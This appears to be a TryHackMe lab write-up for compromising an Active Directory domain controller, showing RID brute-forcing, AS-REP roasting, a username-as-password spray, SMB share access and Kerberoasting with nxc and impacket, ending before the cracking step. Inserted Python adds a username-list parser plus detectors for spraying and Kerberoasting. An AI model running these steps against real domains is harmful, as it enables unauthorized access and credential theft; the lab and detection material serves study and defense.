Introduction
This article is a writeup for TryHackMe.
The room is Soupedecode 01 and its difficulty is Easy.
In this room you can learn the basic attacks used to compromise a domain controller in an Active Directory environment: abusing Kerberos authentication, navigating SMB shares, password spraying, and pass-the-hash.
Recon
Port Scan
Scanned at 2026-05-08 23:51:40 JST for 106s
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 126 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 126 Microsoft Windows Kerberos (server time: 2026-05-08 14:51:48Z)
135/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 126 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL, Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 126
464/tcp open kpasswd5? syn-ack ttl 126
593/tcp open ncacn_http syn-ack ttl 126 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 126
3268/tcp open ldap syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 126
3389/tcp open ms-wbt-server syn-ack ttl 126 Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC01.SOUPEDECODE.LOCAL
| Issuer: commonName=DC01.SOUPEDECODE.LOCAL
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-05-07T14:48:35
| Not valid after: 2026-11-06T14:48:35
| MD5: 07c9 2b41 e2b3 6ae7 c045 ad39 c274 2853
| SHA-1: d63a 829c da41 84dd fc39 6be3 1179 0c04 9a0e 8a76
| SHA-256: 50a9 eb61 09f2 6cf3 6bda 4097 d52e a8bd 3d9d c61b 4885 5844 2b5a 9216 68fc e0a2
| -----BEGIN CERTIFICATE-----
| MIIC8DCCAdigAwIBAgIQc9mMJ3lItpNMrImPd2sA+TANBgkqhkiG9w0BAQsFADAh
| MR8wHQYDVQQDExZEQzAxLlNPVVBFREVDT0RFLkxPQ0FMMB4XDTI2MDUwNzE0NDgz
| NVoXDTI2MTEwNjE0NDgzNVowITEfMB0GA1UEAxMWREMwMS5TT1VQRURFQ09ERS5M
| T0NBTDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAJ7CWx7YUACSHIuy
| 1qprXEght0YEjgV6aUXZJNUptEXgEdp+VtcI6vE2Zxuoasc09I/adFB/d9gTTwuS
| TqOe5M1PbMVMQUJ3oQE5yC29IlOwW1hv6BFHqHBx4+ATukJ1/PkDepR4MEGMphyt
| BpYZ9eciF2aefpLXcBe/NIJknEjOU8qRzlKEuKfKYa2XW8K+7snLYwbS1WLuk8iS
| vipyCjQ6Cx3TlWLYqv49syf4b/biAUollzrTaQtOWa5+v3O/9dHuYvdt3I2AFaCi
| 95vLR7VTtOFF23zGgZKr7cDKe6azWFW9a489JSDZCc7VxdQrF+DgNt9sBnTwoRoi
| IaOQEjECAwEAAaMkMCIwEwYDVR0lBAwwCgYIKwYBBQUHAwEwCwYDVR0PBAQDAgQw
| MA0GCSqGSIb3DQEBCwUAA4IBAQAFkjBKi0gqhYsozUjfppNf3lCSg42AjgjU8bUG
| crL/Hbbwrrt92s4jf+xuQ+YBcrRTVb9GHEknuCDEp2nNukXhG3CtjPBohivBW555
| zJdcllc8iyUrjUDMG7nd+Vnn6BjA2yXqn2UiIHa6nT70/tkzW+LKh/LMUgxwN6Jv
| a9nqmf7q3uUiMehX4Q3jViX0/2nthW5cPifcRufjABIJPiIW2syrGzQoO/OzXom/
| 0UBcvgx6IcI10jjvpUVJ+mv/ZIFyVnHG3KEa0yI/IpkOXbv3smH+9DJgbM7BNo/e
| udNSoTj4RnExB8d2xuTmkuZY9GC0CXWYOxHjtl6SQJQCrLs4
|_-----END CERTIFICATE-----
| rdp-ntlm-info:
| Target_Name: SOUPEDECODE
| NetBIOS_Domain_Name: SOUPEDECODE
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: SOUPEDECODE.LOCAL
| DNS_Computer_Name: DC01.SOUPEDECODE.LOCAL
| Product_Version: 10.0.20348
|_ System_Time: 2026-05-08T14:52:39+00:00
|_ssl-date: 2026-05-08T14:53:19+00:00; +1s from scanner time.
9389/tcp open mc-nmf syn-ack ttl 126 .NET Message Framing
49664/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49674/tcp open ncacn_http syn-ack ttl 126 Microsoft Windows RPC over HTTP 1.0
49739/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 24271/tcp): CLEAN (Timeout)
| Check 2 (port 22534/tcp): CLEAN (Timeout)
| Check 3 (port 39411/udp): CLEAN (Timeout)
| Check 4 (port 43906/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2026-05-08T14:52:42
|_ start_date: N/A
We investigate starting from the port scan results above.
enum4linux
┌──(rikuxx㉿kali)-[~]
└─$ enum4linux [target_ip]
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat May 9 00:30:06 2026
=========================================( Target Information )=========================================
Target ........... [target_ip]
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on [target_ip] )===========================
[E] Can't find workgroup/domain
===============================( Nbtstat Information for [target_ip] )===============================
Looking up status of [target_ip]
No reply from [target_ip]
===================================( Session Check on [target_ip] )===================================
[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.
Nothing in particular here.
Add the following to /etc/hosts:
[target_ip] SOUPEDECODE.LOCAL
Scanning
First, let's see how SMB is set up.
┌──(rikuxx㉿kali)-[~]
└─$ nxc smb [target_ip] -u "" -p "" --shares
SMB [target_ip] 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:None)
SMB [target_ip] 445 DC01 [-] SOUPEDECODE.LOCAL\: STATUS_ACCESS_DENIED
SMB [target_ip] 445 DC01 [-] Error enumerating shares: Error occurs while reading from remote(104)
This confirms that SMB is running.
Using the username guest, we check whether any shares are listed.
┌──(rikuxx㉿kali)-[~]
└─$ nxc smb [target_ip] -u "guest" -p "" --shares
SMB [target_ip] 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:None)
SMB [target_ip] 445 DC01 [+] SOUPEDECODE.LOCAL\guest:
SMB [target_ip] 445 DC01 [*] Enumerated shares
SMB [target_ip] 445 DC01 Share Permissions Remark
SMB [target_ip] 445 DC01 ----- ----------- ------
SMB [target_ip] 445 DC01 ADMIN$ Remote Admin
SMB [target_ip] 445 DC01 backup
SMB [target_ip] 445 DC01 C$ Default share
SMB [target_ip] 445 DC01 IPC$ READ Remote IPC
SMB [target_ip] 445 DC01 NETLOGON Logon server share
SMB [target_ip] 445 DC01 SYSVOL Logon server share
SMB [target_ip] 445 DC01 Users
The shares can be listed even with an empty password.
First, let's look at the Users share.
┌──(rikuxx㉿kali)-[~]
└─$ nxc smb [target_ip] -u "guest" -p "" --shares "Users"
SMB [target_ip] 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:None)
SMB [target_ip] 445 DC01 [+] SOUPEDECODE.LOCAL\guest:
SMB [target_ip] 445 DC01 [*] Enumerated shares
SMB [target_ip] 445 DC01 Share Permissions Remark
SMB [target_ip] 445 DC01 ----- ----------- ------
Nothing there.
Let's check backup as well.
┌──(rikuxx㉿kali)-[~]
└─$ nxc smb [target_ip] -u "guest" -p "" --shares "backup"
SMB [target_ip] 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:None)
SMB [target_ip] 445 DC01 [+] SOUPEDECODE.LOCAL\guest:
SMB [target_ip] 445 DC01 [*] Enumerated shares
SMB [target_ip] 445 DC01 Share Permissions Remark
SMB [target_ip] 445 DC01 ----- ----------- ------
Nothing here either.
Let's also look at LDAP.
┌──(rikuxx㉿kali)-[~]
└─$ nxc ldap [target_ip]
LDAP [target_ip] 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:None) (channel binding:No TLS cert)
LDAP is confirmed to be present.
Let's check whether anything can be read with username guest and an empty password.
┌──(rikuxx㉿kali)-[~]
└─$ nxc ldap [target_ip] -u "guest" -p "" --users
LDAP [target_ip] 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:None) (channel binding:No TLS cert)
LDAP [target_ip] 389 DC01 [-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090A58, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4f7c
LDAP [target_ip] 389 DC01 [+] SOUPEDECODE.LOCAL\guest:
LDAP [target_ip] 389 DC01 [-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090A58, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4f7c
It errors out and the search fails.
Let's also try ldapsearch.
┌──(rikuxx㉿kali)-[~]
└─$ ldapsearch -H ldap://[target_ip] -x -b "dc=SOUPEDECODE,dc=LOCAL"
# extended LDIF
#
# LDAPv3
# base <dc=SOUPEDECODE,dc=LOCAL> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A58, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4f7c
# numResponses: 1
No luck with this either.
Exploitation
Here we use SMB to brute-force RIDs and see whether a user list can be obtained.
┌──(rikuxx㉿kali)-[~]
└─$ nxc smb [target_ip] -u 'guest' -p '' --rid-brute
SMB [target_ip] 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:None)
SMB [target_ip] 445 DC01 [+] SOUPEDECODE.LOCAL\guest:
SMB [target_ip] 445 DC01 498: SOUPEDECODE\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB [target_ip] 445 DC01 500: SOUPEDECODE\Administrator (SidTypeUser)
SMB [target_ip] 445 DC01 501: SOUPEDECODE\Guest (SidTypeUser)
SMB [target_ip] 445 DC01 502: SOUPEDECODE\krbtgt (SidTypeUser)
SMB [target_ip] 445 DC01 512: SOUPEDECODE\Domain Admins (SidTypeGroup)
SMB [target_ip] 445 DC01 513: SOUPEDECODE\Domain Users (SidTypeGroup)
.....
.....
SMB [target_ip] 445 DC01 2164: SOUPEDECODE\backup_svc (SidTypeUser)
SMB [target_ip] 445 DC01 2165: SOUPEDECODE\web_svc (SidTypeUser)
SMB [target_ip] 445 DC01 2166: SOUPEDECODE\monitoring_svc (SidTypeUser)
SMB [target_ip] 445 DC01 2168: SOUPEDECODE\admin (SidTypeUser)
That succeeded in collecting roughly 2,100 names.
We build a user list file named users.txt from them.
┌──(rikuxx㉿kali)-[~]
└─$ nxc smb [target_ip] -u 'guest' -p '' --rid-brute | grep -oP 'SOUPEDECODE\\\K[^ ]+' | sed 's/(.*//' > users.txt
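The grep/sed one-liner above keeps only the first whitespace-separated token after the backslash, so multi-word group names such as "Enterprise Read-only Domain Controllers" and "Domain Admins" leak fragments like "Enterprise" and "Domain" into users.txt (they show up later as SOUPEDECODE.LOCAL\Enterprise:Enterprise attempts). The parser below is an added example, not code from the original post: it matches the whole "RID: DOMAIN\name (SidType...)" line, keeps only SidTypeUser entries, and drops machine accounts (trailing $) unless asked for. The sample output is a constructed excerpt modelled on the nxc lines shown above, with the IP replaced by a placeholder.

```python
import re
from typing import List

# Constructed sample modelled on the nxc --rid-brute output shown above.
# The multi-word group names are exactly what a "first token" grep mishandles.
SAMPLE_OUTPUT = """\
SMB [target_ip] 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:None)
SMB [target_ip] 445 DC01 [+] SOUPEDECODE.LOCAL\\guest:
SMB [target_ip] 445 DC01 498: SOUPEDECODE\\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB [target_ip] 445 DC01 500: SOUPEDECODE\\Administrator (SidTypeUser)
SMB [target_ip] 445 DC01 501: SOUPEDECODE\\Guest (SidTypeUser)
SMB [target_ip] 445 DC01 502: SOUPEDECODE\\krbtgt (SidTypeUser)
SMB [target_ip] 445 DC01 512: SOUPEDECODE\\Domain Admins (SidTypeGroup)
SMB [target_ip] 445 DC01 513: SOUPEDECODE\\Domain Users (SidTypeGroup)
SMB [target_ip] 445 DC01 1000: SOUPEDECODE\\DC01$ (SidTypeUser)
SMB [target_ip] 445 DC01 2164: SOUPEDECODE\\backup_svc (SidTypeUser)
SMB [target_ip] 445 DC01 2168: SOUPEDECODE\\admin (SidTypeUser)
"""

# One resolved RID per line: "SMB <host> <port> <name> <rid>: <DOMAIN>\<name> (<SidType>)".
# The name is matched lazily up to the final " (SidType...)" so spaces inside it survive.
RID_LINE = re.compile(
    r"^SMB\s+\S+\s+\d+\s+\S+\s+(?P<rid>\d+):\s+"
    r"(?P<domain>[^\\]+)\\(?P<name>.+?)\s+\((?P<type>SidType\w+)\)\s*$"
)


def parse_rid_brute(text: str) -> List[dict]:
    """Return one dict per resolved RID with keys rid, domain, name, sid_type."""
    entries = []
    for line in text.splitlines():
        m = RID_LINE.match(line.rstrip())
        if m:  # banner and auth lines ("[*]", "[+]") do not match and are skipped
            entries.append({"rid": int(m["rid"]), "domain": m["domain"],
                            "name": m["name"], "sid_type": m["type"]})
    return entries


def user_accounts(entries: List[dict], include_machine: bool = False) -> List[str]:
    """Names of SidTypeUser entries only, in RID order; machine accounts dropped by default."""
    names = []
    for e in entries:
        if e["sid_type"] != "SidTypeUser":
            continue
        if e["name"].endswith("$") and not include_machine:
            continue
        names.append(e["name"])
    return names


def userlist_text(entries: List[dict]) -> str:
    """The users.txt content: one real user principal per line, no group fragments."""
    return "\n".join(user_accounts(entries)) + "\n"


if __name__ == "__main__":
    print(userlist_text(parse_rid_brute(SAMPLE_OUTPUT)), end="")
```

Feed it the saved nxc output instead of the embedded sample (for example `parse_rid_brute(open("rid_brute.log").read())`) and the resulting list contains only principals that can actually authenticate, which also keeps the later username-as-password check from wasting attempts on names that do not exist.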
Using users.txt, we check with AS-REP Roasting whether the KDC hands out an AS-REP (TGT) for any account that does not require pre-authentication.
┌──(rikuxx㉿kali)-[~/tryhackme/Soupedecode_01]
└─$ impacket-GetNPUsers SOUPEDECODE.LOCAL/ -usersfile users.txt -format hashcat -outputfile hashes.asrep -dc-ip [target_ip]
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
.....
.....
[-] User web_svc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User monitoring_svc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User admin doesn't have UF_DONT_REQUIRE_PREAUTH set
It seems no ticket can be extracted this way.
Next we test against SMB whether any account uses its own username as its password, trying every user/password combination.
┌──(rikuxx㉿kali)-[~/tryhackme/Soupedecode_01]
└─$ nxc smb [target_ip] -u users.txt -p users.txt --continue-on-success
SMB [target_ip] 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:None)
SMB [target_ip] 445 DC01 [+] SOUPEDECODE.LOCAL\Enterprise:Enterprise (Guest)
SMB [target_ip] 445 DC01 [-] SOUPEDECODE.LOCAL\Administrator:Enterprise STATUS_LOGON_FAILURE
SMB [target_ip] 445 DC01 [-] SOUPEDECODE.LOCAL\Guest:Enterprise STATUS_LOGON_FAILURE
SMB [target_ip] 445 DC01 [-] SOUPEDECODE.LOCAL\krbtgt:Enterprise STATUS_LOGON_FAILURE
....
.....
However, checking every combination would take more than half a day.
According to the writeup I referred to, trying every combination is not realistic.
So instead we check only whether each account's password equals its username: with --no-brute, nxc pairs each line of the user file with the same line of the password file instead of trying the full cross product.
┌──(rikuxx㉿kali)-[~/tryhackme/Soupedecode_01]
└─$ nxc smb soupdecode.local -u users.txt -p users.txt --no-brute --continue-on-success
SMB [target_ip] 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:None)
SMB [target_ip] 445 DC01 [+] SOUPEDECODE.LOCAL\Enterprise:Enterprise (Guest)
SMB [target_ip] 445 DC01 [-] SOUPEDECODE.LOCAL\Administrator:Administrator STATUS_LOGON_FAILURE
SMB [target_ip] 445 DC01 [-] SOUPEDECODE.LOCAL\Guest:Guest STATUS_LOGON_FAILURE
SMB [target_ip] 445 DC01 [-] SOUPEDECODE.LOCAL\krbtgt:krbtgt STATUS_LOGON_FAILURE
SMB [target_ip] 445 DC01 [+] SOUPEDECODE.LOCAL\Domain:Domain (Guest)
.....
.....
SMB [target_ip] 445 DC01 [-] SOUPEDECODE.LOCAL\zfrank28:zfrank28 STATUS_LOGON_FAILURE
SMB [target_ip] 445 DC01 [+] SOUPEDECODE.LOCAL\[USERNAME]:[LEAKED_PASSWORD]
SMB [target_ip] 445 DC01 [-] SOUPEDECODE.LOCAL\file_svc:file_svc STATUS_LOGON_FAILURE
.....
.....
This identified an account whose password is the same as its username.
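From the domain controller's side, the username-as-password check above is a burst of failed logons (Security event 4625) from one source against many different accounts in a few seconds, which is the classic password-spray signature. The detector below is an added example, not part of the original post: it groups 4625 events by source IP and alerts when one source fails against at least min_users distinct accounts inside a sliding time window. The events are a constructed sample in the shape a SIEM export might use; the field names (time, event_id, target_user, src_ip, sub_status) are hypothetical and would be mapped from your own schema.

```python
import json
from collections import Counter, defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed sample of failed-logon events (event 4625), one JSON object per line,
# with hypothetical field names. Six accounts fail from one source within seconds
# (one of them, "Enterprise", is a group-name fragment, so the DC answers 0xC0000064
# "no such user"); one account fails once from another host (a typo); one event is
# a successful logon (4624), which the detector ignores.
SAMPLE_EVENTS = """\
{"time": "2026-05-09T00:40:01Z", "event_id": 4625, "target_user": "Administrator", "src_ip": "10.10.14.5", "sub_status": "0xC000006A"}
{"time": "2026-05-09T00:40:01Z", "event_id": 4625, "target_user": "Guest", "src_ip": "10.10.14.5", "sub_status": "0xC000006A"}
{"time": "2026-05-09T00:40:02Z", "event_id": 4625, "target_user": "krbtgt", "src_ip": "10.10.14.5", "sub_status": "0xC000006A"}
{"time": "2026-05-09T00:40:02Z", "event_id": 4625, "target_user": "Enterprise", "src_ip": "10.10.14.5", "sub_status": "0xC0000064"}
{"time": "2026-05-09T00:40:03Z", "event_id": 4625, "target_user": "bmark0", "src_ip": "10.10.14.5", "sub_status": "0xC000006A"}
{"time": "2026-05-09T00:40:03Z", "event_id": 4625, "target_user": "otara1", "src_ip": "10.10.14.5", "sub_status": "0xC000006A"}
{"time": "2026-05-09T00:40:04Z", "event_id": 4624, "target_user": "admin", "src_ip": "10.10.14.5", "sub_status": "0x0"}
{"time": "2026-05-09T00:45:00Z", "event_id": 4625, "target_user": "kleo2", "src_ip": "10.10.14.99", "sub_status": "0xC000006A"}
"""


def parse_events(text: str) -> List[dict]:
    """Parse JSON lines and convert the timestamp to a datetime for window arithmetic."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        e = json.loads(line)
        e["time"] = datetime.strptime(e["time"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(e)
    return events


def detect_spray(events: List[dict], window_seconds: int = 300,
                 min_users: int = 5) -> Dict[str, List[str]]:
    """Map source IP -> sorted distinct accounts it failed against, for every source
    that hit at least min_users distinct accounts inside a sliding window.
    Sub-status is deliberately not filtered: a spray driven by a harvested list
    produces both 0xC000006A (bad password) and 0xC0000064 (unknown user), and both
    count as signal."""
    by_ip = defaultdict(list)
    for e in events:
        if e["event_id"] == 4625:
            by_ip[e["src_ip"]].append((e["time"], e["target_user"]))

    window = timedelta(seconds=window_seconds)
    alerts: Dict[str, set] = {}
    for ip, attempts in by_ip.items():
        attempts.sort()                 # chronological; tuples sort on time first
        in_window = Counter()           # distinct users currently inside the window
        start = 0
        for t, user in attempts:
            in_window[user] += 1
            while t - attempts[start][0] > window:   # evict attempts that fell out
                old = attempts[start][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                start += 1
            if len(in_window) >= min_users:
                alerts.setdefault(ip, set()).update(in_window)
    return {ip: sorted(users) for ip, users in alerts.items()}


if __name__ == "__main__":
    for ip, users in detect_spray(parse_events(SAMPLE_EVENTS)).items():
        print(f"possible spray from {ip}: {len(users)} accounts: {', '.join(users)}")
```

The threshold and window are the tuning knobs: a help-desk workstation legitimately fails against a handful of accounts per day, while the run above touches thousands within minutes, so even a conservative setting separates the two. A fine-grained account lockout policy on the DC would also throttle the single-pair check that found ybob317, at the cost of lockout noise from a list this size.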
Using the identified username and password, we check whether the shares can now be read.
┌──(rikuxx㉿kali)-[~/tryhackme/Soupedecode_01]
└─$ nxc smb soupdecode.local -u [USERNAME] -p [LEAKED_PASSWORD] --shares
SMB [target_ip] 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:None)
SMB [target_ip] 445 DC01 [+] SOUPEDECODE.LOCAL\ybob317:ybob317
SMB [target_ip] 445 DC01 [*] Enumerated shares
SMB [target_ip] 445 DC01 Share Permissions Remark
SMB [target_ip] 445 DC01 ----- ----------- ------
SMB [target_ip] 445 DC01 ADMIN$ Remote Admin
SMB [target_ip] 445 DC01 backup
SMB [target_ip] 445 DC01 C$ Default share
SMB [target_ip] 445 DC01 IPC$ READ Remote IPC
SMB [target_ip] 445 DC01 NETLOGON READ Logon server share
SMB [target_ip] 445 DC01 SYSVOL READ Logon server share
SMB [target_ip] 445 DC01 Users READ
We can now read the shares.
We access backup and Users with smbclient.
┌──(rikuxx㉿kali)-[~/tryhackme/Soupedecode_01]
└─$ smbclient //[target_ip]/backup -U '[USERNAME]%[LEAKED_PASSWORD]'
Try "help" to get a list of possible commands.
smb: \> dir
NT_STATUS_ACCESS_DENIED listing \*
smb: \>
┌──(rikuxx㉿kali)-[~/tryhackme/Soupedecode_01]
└─$ smbclient //[target_ip]/Users -U '[USERNAME]%[LEAKED_PASSWORD]'
Try "help" to get a list of possible commands.
smb: \> dir
. DR 0 Fri Jul 5 07:48:22 2024
.. DHS 0 Sun May 10 00:21:06 2026
admin D 0 Fri Jul 5 07:49:01 2024
Administrator D 0 Sun May 10 00:30:48 2026
All Users DHSrn 0 Sat May 8 17:26:16 2021
Default DHR 0 Sun Jun 16 11:51:08 2024
Default User DHSrn 0 Sat May 8 17:26:16 2021
desktop.ini AHS 174 Sat May 8 17:14:03 2021
Public DR 0 Sun Jun 16 02:54:32 2024
[USERNAME] D 0 Tue Jun 18 02:24:32 2024
12942591 blocks of size 4096. 10704500 blocks available
smb: \>
Inside Users we notice that the personal folder of [USERNAME] is being shared.
Moving to \[USERNAME]\Desktop\, we find user.txt and can retrieve the flag.
smb: \[USERNAME]\Desktop\> dir
. DR 0 Sat Jul 26 02:51:44 2025
.. D 0 Tue Jun 18 02:24:32 2024
desktop.ini AHS 282 Tue Jun 18 02:24:32 2024
user.txt A 33 Sat Jul 26 02:51:44 2025
12942591 blocks of size 4096. 10704500 blocks available
smb: \[USERNAME]\Desktop\> mget user.txt
.....
.....
What is the user flag?
Answer: XXXXXXXXXXXXXXXXXX
Privilege Escalation
Next, using the account we identified, we check whether service tickets (TGS) can be requested for accounts that have an SPN, i.e. Kerberoasting.
┌──(rikuxx㉿kali)-[~/tryhackme/Soupedecode_01]
└─$ impacket-GetUserSPNs SOUPEDECODE.LOCAL/[USERNAME]:[LEAKED_PASSWORD] -dc-ip [target_ip] -request
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------- -------------- -------- -------------------------- --------- ----------
FTP/FileServer file_svc 2024-06-18 02:32:23.726085 <never>
FW/ProxyServer firewall_svc 2024-06-18 02:28:32.710125 <never>
HTTP/BackupServer backup_svc 2024-06-18 02:28:49.476511 <never>
HTTP/WebServer web_svc 2024-06-18 02:29:04.569417 <never>
HTTPS/MonitoringServer monitoring_svc 2024-06-18 02:29:18.511871 <never>
[-] CCache file is not found. Skipping...
$krb5tgs$23$*file_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL/file_svc*$25f7cb6a8070bdc7fc98827cc15144e7$...
$krb5tgs$23$*firewall_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL/firewall_svc*$b0ac0d531e0a00d02bd27dd86a90ccd7$...
$krb5tgs$23$*backup_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL/backup_svc*$58b9811c2f4f2eacfca27aa142d5b4d4$...
$krb5tgs$23$*web_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL/web_svc*$71f4d7cbe0632e1a0c27725720c53b11$...
$krb5tgs$23$*monitoring_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL/monitoring_svc*$cf630ab775e7ce8d80a0808fa6ab0c9c$...
It turns out TGS tickets were issued for file_svc, firewall_svc, backup_svc, web_svc and monitoring_svc. This suggests we can push further using these service tickets directly.
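Every one of those tickets is an RC4-HMAC (etype 23) TGS, which is why hashcat mode 13100 applies; on the domain controller each request is logged as Security event 4769 with TicketEncryptionType 0x17. The detector below is an added example, not code from the original post: it flags 4769 events that requested an RC4 ticket for a non-machine service account and reports any requester that collected such tickets for several distinct services, which is what one GetUserSPNs -request run looks like. The events are a constructed sample with hypothetical field names (requester, service, etype, src_ip); the requester name jdoe is likewise invented.

```python
import json
from collections import defaultdict
from typing import Dict, List

RC4_HMAC = "0x17"   # TicketEncryptionType for RC4-HMAC (etype 23) in event 4769

# Constructed sample of service-ticket events (event 4769), one JSON object per
# line, hypothetical field names. "jdoe" (invented) pulls RC4 tickets for all five
# SPN accounts listed above within two seconds; the remaining events are an AES
# ticket for a machine account and a single AES ticket for a service account.
SAMPLE_EVENTS = """\
{"time": "2026-05-10T01:30:00Z", "event_id": 4769, "requester": "jdoe", "service": "file_svc", "etype": "0x17", "src_ip": "10.10.14.5"}
{"time": "2026-05-10T01:30:00Z", "event_id": 4769, "requester": "jdoe", "service": "firewall_svc", "etype": "0x17", "src_ip": "10.10.14.5"}
{"time": "2026-05-10T01:30:01Z", "event_id": 4769, "requester": "jdoe", "service": "backup_svc", "etype": "0x17", "src_ip": "10.10.14.5"}
{"time": "2026-05-10T01:30:01Z", "event_id": 4769, "requester": "jdoe", "service": "web_svc", "etype": "0x17", "src_ip": "10.10.14.5"}
{"time": "2026-05-10T01:30:02Z", "event_id": 4769, "requester": "jdoe", "service": "monitoring_svc", "etype": "0x17", "src_ip": "10.10.14.5"}
{"time": "2026-05-10T01:30:05Z", "event_id": 4769, "requester": "WS01$", "service": "DC01$", "etype": "0x12", "src_ip": "10.10.20.7"}
{"time": "2026-05-10T01:31:10Z", "event_id": 4769, "requester": "bmark0", "service": "web_svc", "etype": "0x12", "src_ip": "10.10.20.8"}
"""


def load_events(text: str) -> List[dict]:
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def is_roastable_target(service: str) -> bool:
    """Machine accounts carry long random passwords and krbtgt is not an SPN
    target, so only human-set service account passwords matter here."""
    return not service.endswith("$") and service.lower() != "krbtgt"


def rc4_service_requests(events: List[dict]) -> List[dict]:
    """Every 4769 that obtained an RC4 ticket for a non-machine service account."""
    return [e for e in events
            if e["event_id"] == 4769
            and e["etype"] == RC4_HMAC
            and is_roastable_target(e["service"])]


def find_kerberoast(events: List[dict], min_services: int = 3) -> Dict[str, List[str]]:
    """requester -> sorted distinct services it obtained RC4 tickets for,
    limited to requesters that reached at least min_services services."""
    per_requester = defaultdict(set)
    for e in rc4_service_requests(events):
        per_requester[e["requester"]].add(e["service"])
    return {r: sorted(s) for r, s in per_requester.items() if len(s) >= min_services}


if __name__ == "__main__":
    for requester, services in find_kerberoast(load_events(SAMPLE_EVENTS)).items():
        print(f"{requester} requested RC4 tickets for {len(services)} services: {', '.join(services)}")
```

The etype check is the important part: once service accounts are configured for AES only (or moved to group managed service accounts, whose passwords are not crackable in practice), a 0x17 request for one of them is itself an anomaly, and the offline cracking shown next stops working regardless of wordlist.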
We crack the TGS tickets with the following commands.
┌──(rikuxx㉿kali)-[~/tryhackme/Soupedecode_01]
└─$ impacket-GetUserSPNs SOUPEDECODE.LOCAL/[USERNAME]:[LEAKED_PASSWORD] -dc-ip [target_ip] -request > all_hashes.txt
┌──(rikuxx㉿kali)-[~/tryhackme/Soupedecode_01]
